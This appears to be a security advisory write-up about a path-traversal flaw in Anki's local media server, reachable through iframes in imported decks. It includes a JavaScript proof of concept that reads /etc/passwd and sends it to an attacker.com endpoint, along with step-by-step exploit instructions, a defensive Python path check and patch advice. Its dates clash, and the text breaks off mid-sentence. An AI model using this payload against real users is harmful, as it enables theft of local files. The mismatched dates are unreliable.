How the Mentioned CVE Works
Anki’s desktop interface relies on a local HTTP server that serves media files and renders web-based content such as cards and editor views. This server listens on localhost and exposes an internal API that the Rust backend uses to communicate with webviews. To prevent untrusted scripts running inside the reviewer or editor from accessing this API, Anki implemented a security measure that blocks direct script access.
However, this protection does not extend to scripts loaded via iframes embedded in the editor. An attacker can craft a malicious `.apkg` deck that includes an HTML or SVG file containing an iframe. When the user imports this deck and views the card, the iframe’s script executes in the context of the editor webview and gains access to the internal localhost API.
While only a limited set of API methods are exposed, one critical endpoint—getImageForOcclusion—allows the attacker to read arbitrary files from the filesystem. By supplying a path traversal payload (e.g., ../../../../etc/passwd), the attacker can read any file accessible to the Anki process.
Once the file content is read, the script can exfiltrate it over the network by making an outbound HTTP request to an attacker-controlled server. No special configuration is required on the victim’s side; simply importing and viewing a card from an untrusted deck is sufficient to trigger the vulnerability.
The vulnerability affects all desktop platforms—Windows, macOS, and Linux—and the severity varies by browser due to Private Network Access (PNA) restrictions: Chrome/Chromium offers the most protection, Safari has partial OS-level protections, and Firefox is the most vulnerable.
CWE: CWE-22 (Path Traversal)
Reporter: Bankde (Eakasit)
DailyCVE Form:
Platform: aqt (PyPI)
Version: <= 25.09.3
Vulnerability: Path Traversal
Severity: Medium (CVSS 6.5)
Date: 2026-06-19
Prediction: 2026-05-08 (patched)
What Undercode Say: Analytics
Root Cause Analysis:
The vulnerability stems from insufficient validation of the `Origin` header combined with a failure to restrict path traversal sequences in the `getImageForOcclusion` endpoint. The local HTTP server does not properly sanitize file paths before serving them, allowing `../` sequences to escape the intended media directory.
Affected Endpoint:
POST /_anki/getImageForOcclusion
Example Path Traversal Payload:
// Malicious iframe script inside an imported deck
fetch('http://localhost:8765/_anki/getImageForOcclusion', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ path: '../../../../etc/passwd' })
})
  .then(res => res.text())
  .then(data => {
    // Exfiltrate to attacker server
    fetch('https://attacker.com/exfil', {
      method: 'POST',
      body: data
    });
  });
Anki Internal API Reference (mediasrv.py):
qt/aqt/mediasrv.py::_handle_local_file_request
- The vulnerable endpoint did not properly sanitize '..' sequences.
- The patch in 25.09.4 adds path validation to prevent directory traversal.
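The kind of containment check the patch description calls for, as an added illustration rather than Anki's own code: the media directory, the `resolve_media_path` and `read_media_file` helpers and the sample file are all constructed for this example. It normalises both `/` and `\` separators so the Windows-style payload mentioned below is handled, resolves symlinks, and only serves a path that still sits inside the media folder.

```python
import tempfile
from pathlib import Path
from typing import Optional

# Constructed media directory for the demonstration (not Anki's real layout).
MEDIA_DIR = Path(tempfile.mkdtemp(prefix="anki-media-demo-"))
(MEDIA_DIR / "card.png").write_bytes(b"\x89PNG demo")


def resolve_media_path(media_dir: Path, requested: str) -> Optional[Path]:
    """Return the absolute path of `requested` inside `media_dir`, or None
    if the request would escape the media folder (hypothetical hardening
    check, not the project's code)."""
    if not requested or "\x00" in requested:
        return None
    # Treat backslashes as separators so '..\\..\\Windows\\win.ini' is
    # judged the same way as '../../Windows/win.ini'.
    normalized = requested.replace("\\", "/")
    # Media references must be relative: reject '/etc/passwd' and 'C:/...'.
    if normalized.startswith("/") or (len(normalized) > 1 and normalized[1] == ":"):
        return None
    root = media_dir.resolve()
    # resolve() follows symlinks and collapses '..' against the real tree,
    # so the containment test below is made on the final location.
    candidate = (root / normalized).resolve()
    if candidate == root or not candidate.is_relative_to(root):
        return None
    return candidate


def read_media_file(media_dir: Path, requested: str) -> Optional[bytes]:
    """Serve a file only when its resolved path stays inside media_dir."""
    path = resolve_media_path(media_dir, requested)
    if path is None or not path.is_file():
        return None
    return path.read_bytes()


if __name__ == "__main__":
    # The two payload shapes named on this page, plus a legitimate request.
    for req in ("card.png", "../../../../etc/passwd", "..\\..\\Windows\\win.ini"):
        print(f"{req!r:36} -> {resolve_media_path(MEDIA_DIR, req)}")
```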
Exploit:
To exploit this vulnerability, an attacker must:
- Create a malicious `.apkg` file containing an HTML or SVG card with an embedded iframe.
- The iframe loads a script that targets the internal localhost API endpoint getImageForOcclusion.
- The script supplies a path traversal string (e.g., `../../../../etc/passwd` on Linux or `..\..\Windows\win.ini` on Windows) to read arbitrary files.
- The script exfiltrates the file content to an attacker-controlled server over HTTP.
Exploit Requirements:
- Victim imports the malicious `.apkg` file.
- Victim views the crafted card in the Anki reviewer/editor.
- No user interaction beyond viewing the card is required.
Browser-Specific Considerations:
- Firefox: Most vulnerable—no PNA implementation.
- Safari: Partial protection via macOS OS-level restrictions.
- Chrome/Chromium: PNA restrictions limit localhost access.
Protection:
Official Patch:
- Upgrade to Anki 25.09.4 or later.
- Available via `Tools > Upgrade/Downgrade` inside Anki.
Workarounds (if unable to patch immediately):
- Do not import `.apkg` files from untrusted sources.
- Inspect `.apkg` contents (it is a ZIP archive) for `.html` or `.svg` files containing `
